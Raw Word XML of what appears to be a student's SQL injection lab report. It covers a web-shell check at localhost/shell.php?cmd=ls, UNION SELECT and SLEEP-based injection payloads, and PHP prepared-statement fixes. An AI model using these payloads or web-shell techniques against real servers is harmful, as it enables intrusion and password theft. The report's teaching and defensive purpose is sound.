          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4665160C" wp14:editId="16667AE4">
            <wp:extent cx="3917950" cy="1212850"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="1249870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456D" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:r w:rsidRPr="00AF0193">
        <w:t>To verify this worked, I went to http://localhost/shell.php?cmd=ls in my browser. The page showed a list of all the files in the directory, proving I had full control over the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FCB91D" w14:textId="62864FF5" w:rsidR="005453D1" w:rsidRPr="00AF0193" w:rsidRDefault="005453D1" w:rsidP="00AF0193">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07D32348" wp14:editId="6BA51FEB">
            <wp:extent cx="5943600" cy="1041400"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="414181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4383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3.4 Testing for Limits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3785CA55" w14:textId="4F56DD89" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:r w:rsidRPr="00AF0193">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="005453D1">
        <w:t xml:space="preserve"> then</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve"> tried to look for an email column using UNION SELECT NULL, email, NULL FROM users #. The command failed, which confirmed that the table only uses id, username, and password. I </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF0193">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">also tested a time-based attack using UNION SELECT NULL, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>SLEEP(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>5), NULL #, which made the page hang for 5 seconds, confirming that blind injection was possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AFED1B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4. Mitigation and Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5227F08F" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve">To close these security holes, I followed three main steps. First, I updated the code in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve"> to use </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF0193">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prepared Statements</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF0193">
        <w:t>. This is the most effective fix because it tells the database to treat user input as data, not as code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6144904A" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:r w:rsidRPr="00AF0193">
        <w:t>PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6047C4" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:r w:rsidRPr="00AF0193">
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>stmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve"> = $conn-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>prepare(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve">"SELECT * FROM users WHERE username </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>= ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EADFEB8" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:r w:rsidRPr="00AF0193">
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>stmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>bind_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>param</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>"s", $username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2411D4DA" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:r w:rsidRPr="00AF0193">
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>stmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>execute(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1F7A59" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:r w:rsidRPr="00AF0193">
        <w:t>$result = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>stmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>get_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A5894A" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve">Next, I used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>mysqli_real_escape_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>register.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve"> file to clean up any special characters. Finally, I went into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>config.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve"> and added </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>ini_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>display_errors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>', 0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t>);.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF0193">
        <w:t xml:space="preserve"> This hides database errors from the user so that an attacker cannot use them to learn about the database structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2690B75F" w14:textId="2C1A274A" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193"/>
    <w:p w14:paraId="18D78909" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF0193">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB0E9BA" w14:textId="77777777" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193">
      <w:r w:rsidRPr="00AF0193">
        <w:t>This lab demonstrated how easy it is to take over a server if the PHP code is not written securely. By using UNION SELECT and INTO OUTFILE, I was able to steal passwords and even run system commands. Moving forward, I have learned that using prepared statements is a mandatory step for any developer to prevent these types of attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53089BDA" w14:textId="0597D02E" w:rsidR="00AF0193" w:rsidRPr="00AF0193" w:rsidRDefault="00AF0193" w:rsidP="00AF0193"/>
    <w:p w14:paraId="042D3D31" w14:textId="77777777" w:rsidR="00B4681F" w:rsidRDefault="00B4681F"/>
    <w:sectPr w:rsidR="00B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23B38"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1DF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67AC6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8FA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975403">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="153318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93"/>
    <w:rsid w:val="001965A1"/>
    <w:rsid w:val="005453D1"/>
    <w:rsid w:val="006553C3"/>
    <w:rsid w:val="00994F16"/>
    <w:rsid w:val="00AF0193"/>
    <w:rsid w:val="00B4681F"/>
    <w:rsid w:val="00BE1ACB"/>
    <w:rsid w:val="00F07353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3711"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A85F78A0-0A68-4417-A72F-3A6E664C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9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F019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0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garba</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ahmad garba</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-25T16:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-25T16:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>